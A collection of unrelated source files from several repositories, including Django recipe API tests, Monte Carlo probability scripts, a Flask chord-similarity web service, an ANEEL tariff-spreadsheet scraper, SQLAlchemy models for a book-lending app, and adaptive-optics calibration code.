self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_retrieve_other_user_recipe_forbidden(self):
"""Test a user cannot retrive a recipe from another user"""
recipe = sample_recipe(sample_user())
res = self.client.get(recipe_detail_url(recipe.id))
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_create_basic_recipe_successful(self):
"""Test creating a new recipe with no ingredients or tags assigned"""
payload = sample_recipe_payload(link='www.testlink.com')
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertTrue(
Recipe.objects.filter(user=self.user, **payload).exists()
)
# Test creating with no link
payload = sample_recipe_payload()
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(len(Recipe.objects.all()), 2)
self.assertTrue(
Recipe.objects.filter(user=self.user, **payload).exists()
)
def test_create_basic_recipe_invalid_payload(self):
"""Test refusing recipe creation with invalid payload"""
payloads = [
sample_recipe_payload(title=''),
sample_recipe_payload(time_minutes=-1),
sample_recipe_payload(time_minutes=5.4),
sample_recipe_payload(price=-1.0),
{
'time_minutes': 5,
'price': 50.0
},
{
'title': 'Test',
'price': 50.0
},
{
'title': 'Test',
'time_minutes': 5,
},
]
for payload in payloads:
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(len(Recipe.objects.all()), 0)
def test_create_full_recipe_successful(self):
"""Test creating a new recipe with ingredients and tags assigned"""
ingredient1 = sample_ingredient(self.user)
ingredient2 = sample_ingredient(self.user)
tag = sample_tag(self.user)
payload = sample_recipe_payload()
payload.update({
'ingredients': [ingredient1.id, ingredient2.id],
'tags': [tag.id]
})
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
self.assertEqual(recipe.ingredients.all().count(), 2)
self.assertEqual(recipe.tags.all().count(), 1)
self.assertIn(tag, recipe.tags.all())
self.assertIn(ingredient1, recipe.ingredients.all())
self.assertIn(ingredient2, recipe.ingredients.all())
def test_create_full_recipe_invalid_payload(self):
"""Test refusing full recipe creation with invalid payload"""
payloads = [
sample_recipe_payload().update({'ingredients': [1000]}),
sample_recipe_payload().update({'tags': [1000]})
]
for payload in payloads:
res = self.client.post(RECIPE_LIST_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(len(Recipe.objects.all()), 0)
def test_update_recipe(self):
"""Test updating a recipe"""
# PUT
recipe = sample_recipe(user=self.user, price=10.00, time_minutes=10)
payload = sample_recipe_payload(price=50.00)
res = self.client.put(recipe_detail_url(recipe.id), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
Recipe.objects.get(id=recipe.id).price,
payload['price']
)
# PATCH
payload = {'time_minutes': 30}
res = self.client.patch(recipe_detail_url(recipe.id), payload)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(
Recipe.objects.get(id=recipe.id).time_minutes,
payload['time_minutes']
)
def test_filter_recipes_by_tags(self):
"""Test returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title="Test Recipe 1")
recipe2 = sample_recipe(user=self.user, title="Test Recipe 2")
recipe3 = sample_recipe(user=self.user, title="Test Recipe 3")
recipe4 = sample_recipe(user=self.user, title="Test Recipe 4")
tag1 = sample_tag(user=self.user, name="Tag1")
tag2 = sample_tag(user=self.user, name="Tag2")
tag3 = sample_tag(user=self.user, name="Tag3")
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3.tags.add(tag3)
res = self.client.get(
RECIPE_LIST_URL,
{'tags': f'{tag1.id},{tag2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
serializer4 = RecipeSerializer(recipe4)
self.assertEqual(len(res.data), 2)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
self.assertNotIn(serializer4.data, res.data)
def test_filter_recipe_by_ingredient(self):
"""Test returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title="Test Recipe 1")
recipe2 = sample_recipe(user=self.user, title="Test Recipe 2")
recipe3 = sample_recipe(user=self.user, title="Test Recipe 3")
recipe4 = sample_recipe(user=self.user, title="Test Recipe 4")
ingredient1 = sample_ingredient(user=self.user, name="Ingrident1")
ingredient2 = sample_ingredient(user=self.user, name="Ingrident2")
ingredient3 = sample_ingredient(user=self.user, name="Ingrident3")
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3.ingredients.add(ingredient3)
res = self.client.get(
RECIPE_LIST_URL,
{'ingredients': f'{ingredient1.id},{ingredient2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
serializer4 = RecipeSerializer(recipe4)
self.assertEqual(len(res.data), 2)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
self.assertNotIn(serializer4.data, res.data)
class RecipeImageUploadTests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'<EMAIL>',
'<PASSWORD>'
)
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
img.save(ntf, format='JPEG')
ntf.seek(0)
res = self.client.post(url, {'image': ntf}, format='multipart')
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertIn('image', res.data)
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
``` |
{
"source": "JoaoAreias/Brilliant",
"score": 3
} |
#### File: JoaoAreias/Brilliant/monte_carlo_fabric_of_space.py
```python
from time import sleep
import threading
import numpy as np
total = 0
dist = 0
def point():
return np.random.rand(2)
def simulation(runs=1):
global total
global dist
while runs:
p1 = point()
p2 = point()
dist += np.linalg.norm(p2-p1)
total += 1
runs -= 1
return dist/total
def run_simulation(runs=1, threads=4):
global dist
global total
default_threads = threading.active_count()
total_runs = runs
while runs:
active_threads = threading.active_count()
if active_threads - default_threads < threads:
print("%d%% finnished" % (100 - int(100*runs/total_runs)))
if runs >= 10000:
threading.Thread(target=simulation, kwargs={'runs':10000}).start()
runs -= 10000
else:
threading.Thread(target=simulation, kwargs={'runs':runs}).start()
runs = 0
while default_threads != threading.active_count():
pass
return dist/total
print("--- Stating simulation ---")
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
```
#### File: JoaoAreias/Brilliant/monte_carlo_tournament.py
```python
from numpy.random import choice
total = 0
wins = 0
def play():
players = ['D', 'L', 'M']
winner = choice(['D', 'L'])
loser = 'D' if winner == 'L' else 'L'
waiting = 'M'
while True:
match = [winner, waiting]
w2 = choice(match)
if winner == w2:
return winner
winner = w2
waiting = loser
loser = match[0] if match[0] != w2 else match[1]
def run(runs=1000):
global total
global wins
total += runs
while runs:
if play() == 'M':
wins += 1
runs -= 1
return wins / total
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
``` |
{
"source": "joaoarthurbm/ciframe",
"score": 3
} |
#### File: joaoarthurbm/ciframe/main.py
```python
import json
from flask import Flask, request
import sys
from musica import *
from collections import OrderedDict
import unicodedata
app = Flask(__name__)
def limpa_cifra(raw_cifra):
cifra = []
for m in raw_cifra:
if m.strip() != '':
# filtra tablaturas
if '|' in m:
acorde = m.split('|')[0].split()[0]
cifra.append(acorde)
# lida com acordes separados por espaço
else:
tokens = [token for token in m.split()]
cifra += tokens
return cifra
reload(sys)
sys.setdefaultencoding('utf8')
# colunas do csv
ARTISTA_ID = 0
MUSICA_ID = 1
ARTISTA = 2
MUSICA = 3
GENERO = 4
POPULARIDADE = 5
TOM = 6
SEQ_FAMOSA = 7
CIFRA = 8
TAM_PAGINA = 100
genero_musicas = {}
generos = set()
acordes = set()
sequencias = {'BmGDA' : 0,
'CGAmF' : 1,
'EmG' : 2,
'CA7DmG7' : 3,
'GmF' : 4,
'CC7FFm' : 5}
musicas_dict = {}
f = open('data/top/dataset_final.csv')
f.readline()
for line in f:
line = line.replace('"', '').replace('NA', '')[:-1]
musica = line.split(',')
musica[POPULARIDADE] = int(musica[POPULARIDADE].replace('.', ''))
if musica[CIFRA] != '':
musica[CIFRA] = limpa_cifra(musica[CIFRA].split(';'))
else:
musica[CIFRA] = []
musica[SEQ_FAMOSA] = musica[SEQ_FAMOSA].split(";")
# conjunto único de gêneros
generos.add(musica[GENERO])
# inclui música no dict de músicas
musica_obj = Musica(musica[ARTISTA_ID], musica[ARTISTA],
musica[MUSICA_ID], musica[MUSICA], musica[GENERO],
int(musica[POPULARIDADE]), musica[SEQ_FAMOSA],
musica[TOM], musica[CIFRA])
musicas_dict[musica_obj.id_unico_musica] = musica_obj
# conjunto único de acordes
for acorde in musica_obj.acordes:
acordes.add(acorde)
# constrói dict mapeando gênero para músicas
# deve ser usado para melhorar o desempenho das buscas
if musica_obj.genero in genero_musicas:
genero_musicas[musica_obj.genero].append(musica_obj)
else:
genero_musicas[musica_obj.genero] = [musica_obj]
# dicionário de músicas cujos valores são ordenados por popularidade
musicas = OrderedDict(sorted(musicas_dict.items(),
key=lambda x: x[1].popularidade, reverse = True))
# para trabalhar melhor com json
generos = list(generos)
# ordena genero_musicas por popularidade
for k,v in genero_musicas.items():
genero_musicas[k].sort(key = lambda x : x.popularidade, reverse = True)
f.close()
@app.route('/')
def index():
return app.send_static_file('index.html')
''' Busca por músicas que possuem no título ou no nome do artista o argumento passado por key.
params: key e generos (opcional). Caso generos não sejam definidos, a busca não irá filtrar por gênero.
exemplo 1: /search?key=no dia em que eu saí de casa
exemplo 2: /search?key=no dia em que eu saí de casa&generos=Rock,Samba '''
@app.route('/<path:path>')
def static_proxy(path):
# send_static_file will guess the correct MIME type
return app.send_static_file(path)
@app.route('/search')
def busca():
generos_tag = request.args.get('generos', [])
pagina_tag = request.args.get('pagina','1')
keys = request.args.get('key').lower()
keys = remover_combinantes(keys).split(' ')
generos_key = generos
if generos_tag:
generos_key = generos_tag.encode('utf-8').split(',')
collection = apply_filtro(musicas.values, generos_key)
out = []
for musica in collection:
text = '%s %s' % (musica.nome_artista.lower(), musica.nome_musica.lower())
text_list = remover_combinantes(unicode(text)).split(' ')
if all(key in text_list for key in keys):
matches = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'genero' : musica.genero,
'url' : musica.url,
}
out.append(matches)
return json.dumps(get_pagina(out, pagina_tag))
# cópia
def remover_combinantes(string):
string = unicodedata.normalize('NFD', string)
return u''.join(ch for ch in string if unicodedata.category(ch) != 'Mn')
''' Retorna as músicas armazenadas no sistema (ordenados por popularidade).
O serviço é paginado. Cada página tem tamanho 100, por default.
params: pagina. Caso não seja definida a página, o valor default é 1.
exemplo 1: /musica?pagina=2
exemplo 2: /musica'''
@app.route('/musicas')
def get_musicas():
return json.dumps([v.__dict__ for v in musicas.values()])
@app.route('/generos')
def get_generos():
return json.dumps(generos)
@app.route('/acordes')
def get_acordes():
return json.dumps(list(acordes))
@app.route('/musica/<m_id>/')
def get_musica(m_id):
return json.dumps(musicas[m_id].__dict__)
@app.route('/similares')
def get_similares():
# tratando request
acordes_tag = request.args.get('acordes')
id_musica_tag = request.args.get('id_unico_musica')
sequencia_tag = request.args.get('sequencia')
pagina_tag = request.args.get('pagina','1')
# se não existir, filtra por todos.
generos_tag = request.args.get('generos')
generos_key = generos
if generos_tag:
generos_key = generos_tag.encode('utf-8').split(',')
acordes = []
if acordes_tag:
acordes = acordes_tag.encode('utf-8').split(',')
elif id_musica_tag:
musica = musicas[id_musica_tag]
acordes = musica.acordes
elif sequencia_tag:
acordes = sequencia_tag.encode('utf-8').replace(',','')
similares = []
if acordes in sequencias:
id_seq = sequencias[acordes]
similares = get_pagina(get_similares_por_sequencia(id_seq, generos_key), pagina_tag)
return json.dumps(similares)
similares = get_similares(acordes, generos_key, id_musica_tag)
return json.dumps(get_pagina(similares, pagina_tag))
def get_similares_por_sequencia(id_seq, generos_key):
# filtra para melhor desempenho
collection = apply_filtro(musicas.values(), generos_key)
similares = []
for musica in collection:
if str(id_seq) in musica.seqs_famosas:
similar = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'popularidade' : musica.popularidade,
'acordes' : musica.acordes,
'genero' : musica.genero,
'url' : musica.url,
}
similares.append(similar)
return similares
def get_pagina(colecao, pagina_tag):
sl = (int(pagina_tag) - 1)*TAM_PAGINA
return colecao[sl:sl+TAM_PAGINA]
def get_similares(acordes, generos_key, id_musica = None):
# filtra para melhor desempenho
collection = apply_filtro(musicas.values(), generos_key)
similares = []
for musica in collection:
if musica.id_unico_musica != id_musica:
inter = set(acordes).intersection(set(musica.acordes))
diff = set(musica.acordes) - set(acordes)
# somente as que tiverem interseção e as que forem
# dos generos solicitados.
if len(inter) > 0:
similar = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'popularidade' : musica.popularidade,
'acordes' : musica.acordes,
'genero' : musica.genero,
'url' : musica.url,
'diferenca' : list(diff),
'intersecao' : list(inter)
}
similares.append(similar)
# ordenados por menor diferença, maior interseção e maior popularidade.
return sorted(similares, key=lambda x: (len(x['diferenca']), -len(x['intersecao'])))
## Filtra a coleção de músicas por gênero.
def apply_filtro(musicas, generos_key):
# filtra para melhor desempenho
collection = []
for genero in generos_key:
if genero in generos:
collection += genero_musicas[genero]
return collection
@app.after_request
def add_header(response):
response.headers['Access-Control-Allow-Origin'] = '*'
return response
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "joaoartursilveira/ANEELScraper",
"score": 3
} |
#### File: ANEELScraper/apps/coletor.py
```python
from time import sleep
from bs4 import BeautifulSoup
from datetime import datetime
from unidecode import unidecode
from .conexao_sql import SQLite
import re
def formatar_data(raw_date) -> str:
"""Formatar a data em Y/M/d"""
data_regex = re.compile(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}")
data_formata = data_regex.findall(raw_date)[0].replace('/','-')
return datetime.strptime(data_formata, "%d-%m-%Y").strftime("%Y-%m-%d")
def clear_string(string: str) -> str:
"""Retira caracteres especiais e espaços em branco"""
limpado = unidecode(''.join(char for char in string)).replace(' ', '').upper()
return ''.join(char for char in limpado if char.isalnum())
def localizar_arquivo(agente, data_processo, processo, arquivo,lista_link):
""""Procura os links que contenham o arquivo procurado (SPARTA ou PCAT)"""
if arquivo in lista_link['href'].upper():
agente_padrao = SQLite().info_agente(agente)
lista_processo = [agente_padrao, data_processo, processo, arquivo, lista_link['href']]
return lista_processo
def coletor_tr(driver):
"""Varredura da página procurando-se pelas planilhas de SPARTA e PCAT"""
sleep(2)
soup = BeautifulSoup(driver.page_source, features='html.parser')
driver.quit()
style = {'style': "padding-left: 5px; padding-bottom: 5px; padding-right: 5px; padding-top: 5px;"}
tabela_tr = soup.find_all('tr', style)[1::]
td_css = {'valign': 'top', 'class': 'linha2'}
lista_aneel = []
for linha in tabela_tr:
td = linha.find_all('td', td_css)
processo = clear_string(td[2])
if processo in ['REAJUSTE', 'REVISAO', 'REVISAOEXTRAORDINARIA']:
agente = clear_string(td[0])
data_processo = formatar_data(td[3].text)
for links in linha('a', href=True):
lista_sparta = localizar_arquivo(agente, data_processo, processo, 'SPARTA', links)
lista_pcat = localizar_arquivo(agente, data_processo, processo, 'PCAT', links)
if lista_sparta is not None:
lista_aneel.append(lista_sparta)
if lista_pcat is not None:
lista_aneel.append(lista_pcat)
return lista_aneel
``` |
{
"source": "JoaoAssalim/Mutano_Assistent",
"score": 3
} |
#### File: Mutano_Assistent/Tests/Test_PlayAndStopSong.py
```python
import os
from pathlib import Path
from random import choice
from pygame import mixer
def playAndStopSong():
pasta = os.getcwd()
Music_Folder = Path(pasta + '\Musics')
SongsToPlay = []
for FileMain in os.walk(Music_Folder):
for File in FileMain[2]:
SongsToPlay.append(File)
PlayingSong = choice(SongsToPlay)
print(PlayingSong)
print(f'Tocando: {PlayingSong}')
PlayMusicDirectory = Path(os.getcwd() + '\Musics'+ '\\' + PlayingSong)
mixer.init()
mixer.music.load(PlayMusicDirectory)
mixer.music.play()
stop_playing_song = input('Press Enter to Stop: ')
if stop_playing_song == '' or stop_playing_song != '':
mixer.music.pause()
playAndStopSong()
``` |
{
"source": "joaoassuncao/bookfree",
"score": 3
} |
#### File: app/models/tables.py
```python
from app import db
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
# Login
email = db.Column(db.String, unique = True, nullable = False)
password = db.Column(db.String, nullable = False)
#Info
name = db.Column(db.String)
cpf = db.Column(db.String)
gender = db.Column(db.String)
birthday = db.Column(db.Date)
def __repr__(self):
return "<User %r>" % self.email
class Book(db.Model):
id = db.Column(db.Integer, primary_key = True)
#Info
title = db.Column(db.String, nullable = False)
author = db.Column(db.String, nullable = False)
publisher = db.Column(db.String, nullable = False)
gender = db.Column(db.String, nullable = False)
isbn = db.Column(db.String)
def __repr__(self):
return "<Book %r>" % self.title
class Borrow(db.Model):
id = db.Column(db.Integer, primary_key = True)
#Info
id_lender = db.Column(db.Integer, nullable = False)
id_borrower = db.Column(db.Integer, nullable = False)
id_book = db.Column(db.Integer, nullable = False)
``` |
{
"source": "joao-aveiro/OOPAO",
"score": 2
} |
#### File: AO_modules/calibration/ao_calibration.py
```python
from astropy.io import fits as pfits
import numpy as np
from AO_modules.calibration.CalibrationVault import calibrationVault
from AO_modules.calibration.InteractionMatrix import interactionMatrix
from AO_modules.tools.tools import emptyClass,createFolder, read_fits
def ao_calibration_from_ao_obj(ao_obj, nameFolderIntMat = None, nameIntMat = None, nameFolderBasis = None, nameBasis = None, nMeasurements=50, index_modes = None, get_basis = True):
# check if the name of the basis is specified otherwise take the nominal name
if nameBasis is None:
if ao_obj.dm.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
try:
nameBasis = initName+str(ao_obj.param['resolution'])+'_res'+ao_obj.param['extra']
except:
nameBasis = initName+str(ao_obj.param['resolution'])+'_res'
ao_calib_object = emptyClass()
# check if a name for the origin folder is specified
if nameFolderBasis is None:
nameFolderBasis = ao_obj.param['pathInput']
createFolder(nameFolderBasis)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# get the modal basis :
try:
print('Loading the KL Modal Basis from: ' + nameFolderBasis+nameBasis )
M2C = read_fits(nameFolderBasis+ nameBasis+'.fits')
if index_modes is None:
M2C = M2C[:,:ao_obj.param['nModes']]
else:
M2C = M2C[:,index_modes]
if get_basis:
ao_obj.dm.coefs = M2C
ao_obj.tel*ao_obj.dm
basis = np.reshape(ao_obj.tel.OPD,[ao_obj.tel.resolution**2,M2C.shape[1]])
ao_calib_object.basis = basis
if ao_obj.param['getProjector']:
print('Computing the pseudo-inverse of the modal basis...')
cross_product_basis = np.matmul(basis.T,basis)
non_diagonal_elements = np.sum(np.abs(cross_product_basis))-np.trace(cross_product_basis)
criteria = 1-np.abs(np.trace(cross_product_basis)-non_diagonal_elements)/np.trace(cross_product_basis)
if criteria <= 1e-3:
print('Diagonality criteria: ' + str(criteria) + ' -- using the fast computation')
projector = np.diag(1/np.diag(cross_product_basis))@basis.T
else:
print('Diagonality criteria: ' + str(criteria) + ' -- using the slow computation')
projector = np.linalg.pinv(basis)
ao_calib_object.projector = projector
except:
print('ERROR: No file found! Taking a zonal basis instead..' )
M2C = np.eye(ao_obj.dm.nValidAct)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = ao_obj.param['pathInput']+ao_obj.param['name']+'/'
createFolder(nameFolderIntMat)
#% get the interaction matrix :
if nameIntMat is None:
if ao_obj.wfs.tag == 'pyramid':
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.param['modulation'])+'_mod_'+str(ao_obj.param['postProcessing'])+'_psfCentering_'+str(ao_obj.param['psfCentering'])+ao_obj.param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.param['modulation'])+'_mod_'+str(ao_obj.param['postProcessing'])+'_psfCentering_'+str(ao_obj.param['psfCentering'])
if ao_obj.wfs.tag == 'shackHartmann':
if ao_obj.wfs.is_geometric:
nature = 'geometric'
else:
nature = 'diffractive'
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.wfs.nValidSubaperture)+'_subap_'+nature+'_'+ao_obj.param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.wfs.nValidSubaperture)+'_subap_'+nature
try:
print('Loading Interaction matrix '+nameIntMat+'...')
imat = read_fits(nameFolderIntMat+nameIntMat+'.fits')
calib = calibrationVault(imat@M2C)
print('Done!')
except:
print('ERROR! Computingh the zonal interaction matrix')
M2C_zon = np.eye(ao_obj.dm.nValidAct)
stroke =1e-9 # 1 nm amplitude
calib = interactionMatrix(ao_obj.ngs,ao_obj.atm,ao_obj.tel,ao_obj.dm,ao_obj.wfs,M2C_zon,stroke,phaseOffset = 0,nMeasurements = nMeasurements)
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = 'INTERACTION MATRIX'
empty_primary = pfits.PrimaryHDU(header=hdr)
# primary_hdu = pfits.ImageHDU(calib.D.astype(np.float32))
primary_hdu = pfits.ImageHDU(calib.D)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolderIntMat + nameIntMat + '.fits', overwrite=True)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*ao_obj.atm.r0)+'_cm_'+ao_obj.param['opticalBand']+'_band_fitting_'+str(ao_obj.param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+ao_obj.param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(M2C.shape[1])
print('No Modal Gains found. All gains set to 1')
ao_calib_object.gOpt = np.diag(1/data_gains)
ao_calib_object.M2C = M2C
ao_calib_object.calib = calib
return ao_calib_object
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# same function using an ao object as an input
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def ao_calibration(ngs, tel, atm, dm, wfs, param, nameFolderIntMat = None, nameIntMat = None, nameFolderBasis = None, nameBasis = None, nMeasurements=50, index_modes = None, get_basis = True):
# check if the name of the basis is specified otherwise take the nominal name
if nameBasis is None:
if dm.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
try:
nameBasis = initName+str(param['resolution'])+'_res'+param['extra']
except:
nameBasis = initName+str(param['resolution'])+'_res'
ao_calib_object = emptyClass()
# check if a name for the origin folder is specified
if nameFolderBasis is None:
nameFolderBasis = param['pathInput']
createFolder(nameFolderBasis)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# get the modal basis :
try:
print('Loading the KL Modal Basis from: ' + nameFolderBasis+nameBasis )
M2C = read_fits(nameFolderBasis+ nameBasis+'.fits')
if index_modes is None:
M2C = M2C[:,:param['nModes']]
else:
M2C = M2C[:,index_modes]
if get_basis or param['getProjector']:
dm.coefs = M2C
tel*dm
basis = np.reshape(tel.OPD,[tel.resolution**2,M2C.shape[1]])
ao_calib_object.basis = basis
if param['getProjector']:
print('Computing the pseudo-inverse of the modal basis...')
cross_product_basis = np.matmul(basis.T,basis)
non_diagonal_elements = np.sum(np.abs(cross_product_basis))-np.trace(cross_product_basis)
criteria = 1-np.abs(np.trace(cross_product_basis)-non_diagonal_elements)/np.trace(cross_product_basis)
if criteria <= 1e-3:
print('Diagonality criteria: ' + str(criteria) + ' -- using the fast computation')
projector = np.diag(1/np.diag(cross_product_basis))@basis.T
else:
print('Diagonality criteria: ' + str(criteria) + ' -- using the slow computation')
projector = np.linalg.pinv(basis)
ao_calib_object.projector = projector
except:
print('ERROR: No file found! Taking a zonal basis instead..' )
M2C = np.eye(dm.nValidAct)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = param['pathInput']+param['name']+'/'
createFolder(nameFolderIntMat)
#% get the interaction matrix :
if nameIntMat is None:
if wfs.tag == 'pyramid':
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(param['modulation'])+'_mod_'+str(param['postProcessing'])+'_psfCentering_'+str(param['psfCentering'])+param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(param['modulation'])+'_mod_'+str(param['postProcessing'])+'_psfCentering_'+str(param['psfCentering'])
if wfs.tag == 'shackHartmann':
if wfs.is_geometric:
nature = 'geometric'
else:
nature = 'diffractive'
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(wfs.nValidSubaperture)+'_subap_'+nature+'_'+param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(wfs.nValidSubaperture)+'_subap_'+nature
try:
print('Loading Interaction matrix '+nameIntMat+'...')
imat = read_fits(nameFolderIntMat+nameIntMat+'.fits')
calib = calibrationVault(imat@M2C)
print('Done!')
except:
M2C_zon = np.eye(dm.nValidAct)
stroke =1e-9 # 1 nm amplitude
calib = interactionMatrix(ngs, atm, tel, dm, wfs, M2C_zon, stroke, phaseOffset = 0, nMeasurements = nMeasurements)
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = 'INTERACTION MATRIX'
empty_primary = pfits.PrimaryHDU(header=hdr)
# primary_hdu = pfits.ImageHDU(calib.D.astype(np.float32))
primary_hdu = pfits.ImageHDU(calib.D)
hdu = pfits.HDUList([empty_primary, primary_hdu])
